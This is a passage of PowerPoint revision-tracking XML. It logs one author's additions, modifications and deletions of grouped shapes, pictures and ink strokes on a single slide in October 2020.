            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="76" creationId="{1386B199-FF09-4827-8BDF-865E7BB79797}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:37.802" v="5372"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="78" creationId="{7B6BB0A4-F9AB-458F-A6C9-9E6409411E3B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:44.618" v="5384"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="86" creationId="{B8F76306-19E4-4309-B03E-C56B928DAEB1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0" creationId="{4AFEE917-350D-4BB1-B0F9-D98F8DE8803A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4" creationId="{4ABC480A-6035-4B1E-8C54-C1400998F98A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:54:46.061" v="5603" actId="165"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="99" creationId="{6B41FCEF-CCF4-46E2-B66A-A86211C26A36}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:51:58.015" v="5532" actId="1035"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="103" creationId="{1CB3C09E-1777-4CFB-B625-B8F89D62A4A4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:50:57.454" v="5472" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="108" creationId="{67AF0ED9-7681-41F1-B1C5-7CB212AAA41A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:51:04.344" v="5477"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="113" creationId="{AFBD2EBE-916A-4F72-A6BA-A5CFFFD41E8C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:54:32.994" v="5600" actId="165"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="116" creationId="{2F881FFE-4E42-4D21-A2A9-0125B7D3AFBF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20" creationId="{F409C971-262F-4912-8FEC-62C26FD8B2CF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:55:03.442" v="5607" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="121" creationId="{2774DC9C-2D36-44CB-B31E-7552269D6C20}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:55:20.392" v="5610" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="122" creationId="{5CF34EC8-236C-4366-9D38-A51DEC8F2D38}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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26" creationId="{7F5F1ACC-7503-4C62-BE5A-7B1107E80CE1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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32" creationId="{7A577037-84A7-4447-B8EC-F130FFEB34BB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:56:13.675" v="5627" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="133" creationId="{72663C9C-C775-4D14-8E59-24CB619DF58A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:56:39.099" v="5633" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287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35" creationId="{6EF1A73C-DA41-49C8-B0EA-67ECD1F2665A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40" creationId="{AC1329A5-461A-4B61-ACD0-69E749D97042}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:04:07.230" v="5949"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="146" creationId="{7A4D4D5F-26EB-4CBB-9260-E5EE247CAD70}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:03:53.454" v="5921"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="158" creationId="{D1D3C89A-B7D1-4544-AA38-047DBAD0846D}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:04:05.689" v="5941"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="166" creationId="{5459B587-464B-4040-BB7A-2AEB55453188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72" creationId="{6069DBDE-9968-4131-A26E-F037D86A3AA6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:04:24.015" v="5975"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="186" creationId="{2F5164BA-4E3A-4E3D-8551-E523588FEF18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89" creationId="{06AB914E-9954-4E92-9F4D-ADDAEE3B84CC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90" creationId="{FC0BCE26-52C5-4EEA-A3B3-FEE95CF787A1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del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95" creationId="{2881AF6F-D552-433C-BD8A-8FEFE757268F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:07:06.637" v="6007"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="199" creationId="{75B3DBBE-3D19-4F65-9CED-796CD32C285E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:10:39.828" v="6030"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="206" creationId="{7906ED24-1442-47F7-964D-958D1AF91EB4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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1" creationId="{B227696F-4EE9-48F0-83AF-21CAA3FE19AA}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:11:31.825" v="6042" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="212" creationId="{C362E953-6088-4EC9-9D99-492CAFA42B01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3" creationId="{3C52C0C0-E478-4F8F-A0EE-5B1C2CE17721}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:44:14.988" v="5290" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287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0" creationId="{70C1F084-7360-45BD-BF05-1F67C3E337BC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1" creationId="{249BCCC2-8C0F-4CBC-BB00-27F1B450D6F0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2" creationId="{E6F886F3-D8EE-4695-BFC2-E901EFD04569}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:01:31.575" v="5875" actId="164"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="7" creationId="{A301C9D1-9954-4118-A379-351311569BC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8" creationId="{437F71A3-BCFF-40EA-B2D2-DCFAB9B8572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9" creationId="{E3607B9A-0CE3-474F-8659-7EA6AD1A0604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0" creationId="{CCDF000D-7EA0-47DE-B94D-19B2BD383CC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1" creationId="{D57EFB9D-D6C2-4404-9BAA-5E1134CF729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3" creationId="{B167608B-550D-4B0E-809F-194A639E78BD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4" creationId="{A6AF4097-2894-4671-8C26-245DB4ADA63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5" creationId="{CA8026AD-541F-43E9-A44C-DB8B477E8F0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6" creationId="{3D173C09-B30C-4B66-9D2A-A007C9075A2E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7" creationId="{CED9C981-B1DD-4EFB-9047-499377A9C86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9" creationId="{9D16C622-7365-4612-ADA6-B8AAEDC2B7D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0" creationId="{D93400FA-0CF7-411F-B008-CAA6E86A502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1" creationId="{021EEA2A-251E-4503-8B48-9F699152C037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2" creationId="{87011E12-3038-4C61-A68E-F534873F5D9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3" creationId="{3617AF39-B031-44C5-927A-836A78C18C51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4" creationId="{53C689F3-F2CA-4FA4-96A0-EDC074BC6BE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5" creationId="{DBAA9958-121E-4C75-8018-D3A5935B743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6" creationId="{429DA36A-FD62-407A-95E4-9DD0790AE13C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7" creationId="{FCB95299-0DCF-471C-85EB-506251EA6D23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8" creationId="{A30B0B94-2834-4169-8D46-93B1C41CDA4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0" creationId="{AF7A4E2F-AD41-4788-AE14-32A620ADE87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1" creationId="{68DFFB93-315F-4535-A840-CFD73EEE8D8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2" creationId="{A17680F5-7843-4006-A5AF-49B5904E3CBE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3" creationId="{3195A296-ED09-44DC-BE46-AC871232A67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5" creationId="{9BD56E71-4157-4ADD-B372-9D3EA91BBA2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6" creationId="{112C8A29-F6CF-4314-A788-9D5947BC11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7" creationId="{AA75D06E-525C-4C33-BF69-B8650B5EA79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8" creationId="{B3DB94B5-C995-40CA-A1F1-C37E47C5F7D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9" creationId="{BF7D2B12-3572-4E47-8949-33897557310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0" creationId="{6F026C51-8F36-435B-A6AC-93899008D6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1" creationId="{1F5A4B44-0B91-48C9-AFDF-A23DB7B27CE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2" creationId="{BA0F580B-AFFB-4A87-BD40-EA9237882CF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3" creationId="{EAFA9219-7574-4BC4-8AA9-3C7619C415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4" creationId="{8B90CD81-4969-44AD-B791-C72012BE40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5" creationId="{E95CEB47-0B06-477B-B209-62E613A62B4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7" creationId="{CED888E2-E4CB-4EBC-B223-54CEFF567BF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8" creationId="{3E3D1B4A-2760-47A3-AC20-BF478756B08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9" creationId="{B71B7C35-FCD5-4629-B265-3ABD501BA49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0" creationId="{F5E6C009-648F-464E-80E6-662BCB6A0D7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1" creationId="{05F9BF59-3A82-4FFD-BE93-F85EF68539B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2" creationId="{359495CE-515C-4335-9B05-43A647365FC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3" creationId="{56CCC6F0-AC42-492B-9A15-632114451B1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4" creationId="{685E3E79-7F2B-45AC-8132-5F18A7F1AB7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5" creationId="{AF5DD524-EA61-49E9-B598-970872417EE4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7" creationId="{3A4190C1-C1BC-4600-A3E1-508D859E6132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8" creationId="{F52C9C82-D28E-4EDB-A04F-29F2BC6C664F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:47.686" v="5401" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="60" creationId="{64B59D4D-8DCB-49EB-8B47-FB8D34FC81FC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:47.476" v="5400" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="61" creationId="{E327F1A2-ED69-463C-BB79-49F27ECFFD12}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:47.228" v="5399" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="62" creationId="{FCF4A381-D3C8-4458-ADFE-DCD59F78FD30}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:26.698" v="5358" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="63" creationId="{861F8E97-811D-4552-8542-1B297D0995A2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:26.437" v="5357" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="64" creationId="{166EF378-5368-4EEB-967A-970A60F00AC4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:26.144" v="5356"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="65" creationId="{2CF24FEC-E85D-4FC3-80AF-3C3239FF5F71}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:47.019" v="5398" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="67" creationId="{A46633B9-4795-4183-962F-A2DE5E2ECE75}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:46.843" v="5397" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="68" creationId="{39D69E52-552D-4073-9A30-29054C5C3D4E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:46.653" v="5396" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="69" creationId="{BE8D7943-92F7-437F-8CD8-DB7C901B9BC4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:46.468" v="5395"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="70" creationId="{74B4EDF4-8F9E-43FC-9485-CBB6FDA04D59}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:46.285" v="5393" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="72" creationId="{F59BE295-9F01-42F9-8314-7D164028EFCD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:46.109" v="5392" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="73" creationId="{D623C3F4-067D-4E4E-ACD6-EEC481CC42A5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:45.790" v="5391" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="74" creationId="{F3DB5631-9EE9-4AD3-888C-1001C6F60FB3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:38.232" v="5374"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="75" creationId="{E859C1B3-DEE4-410C-9825-AED62C0C9B4F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:37.802" v="5372"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="77" creationId="{2EB85EB9-2C09-4B35-BA19-4FA038BB55CF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:45.783" v="5390" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="79" creationId="{257FE31C-BADD-4B2B-9077-1AAED28F96D2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:45.582" v="5389" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="80" creationId="{4A792158-14F0-41F5-B9F7-D9AD7CDA4977}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:45.377" v="5388" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="81" creationId="{DF71C6E7-B268-4C31-BA06-503181521542}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:45.175" v="5387" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="82" creationId="{2A762514-7884-43C5-9F5C-33DE3A07E859}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:45.014" v="5386" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="83" creationId="{3035DAAA-7E3C-4EF7-98E5-994C99E471C0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:44.837" v="5385" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="84" creationId="{6E6F0D76-6788-4734-AB0D-4A1BF58B7A72}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:44.618" v="5384"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="85" creationId="{995626F2-A918-4F02-B5D9-7A6E59C2B161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7" creationId="{91F7C6F7-9727-42E4-A421-FA210F7B0948}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod topLvl">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:27:09.678" v="6519" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="88" creationId="{6118EF09-26F3-44E8-ACDA-ECDC5C4F629B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9" creationId="{446402BE-9AD5-44BF-96D8-7D51792EBF2F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1" creationId="{C0D68F5C-0249-4F7B-A28F-B9DCB208CA4D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2" creationId="{154AD3AC-EA91-4298-A346-7E7FB06CBE1C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3" creationId="{541FFA5D-2262-4F8A-9DA7-1BF236593DF3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5" creationId="{5E02C190-B71A-45E3-8E7C-5F1D87944A17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6" creationId="{1E5E0346-4337-4671-97A9-30F02AED7CE1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7" creationId="{E0A5C175-00B7-48EE-AC27-9982C00DB609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8" creationId="{0B578B73-7F00-4573-8ED2-764204FC58A6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1" creationId="{821095D6-3FF1-4333-B45F-D5F27A828E15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2" creationId="{EA3F67AB-ACA5-4676-9C5F-B07B0E0313D9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod topLvl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06" creationId="{442E326D-BD11-4423-BFB9-BAC8B9162F52}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod topLvl">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:50:57.454" v="5472" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="107" creationId="{CF1A5497-DB5D-4681-9B20-50C0C1E00FA4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:51:04.765" v="5478" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:inkMk id="111" creationId="{D1EB836A-BF8B-4D34-85A6-B0BC2F410B71}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:51:04.344" v="5477"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
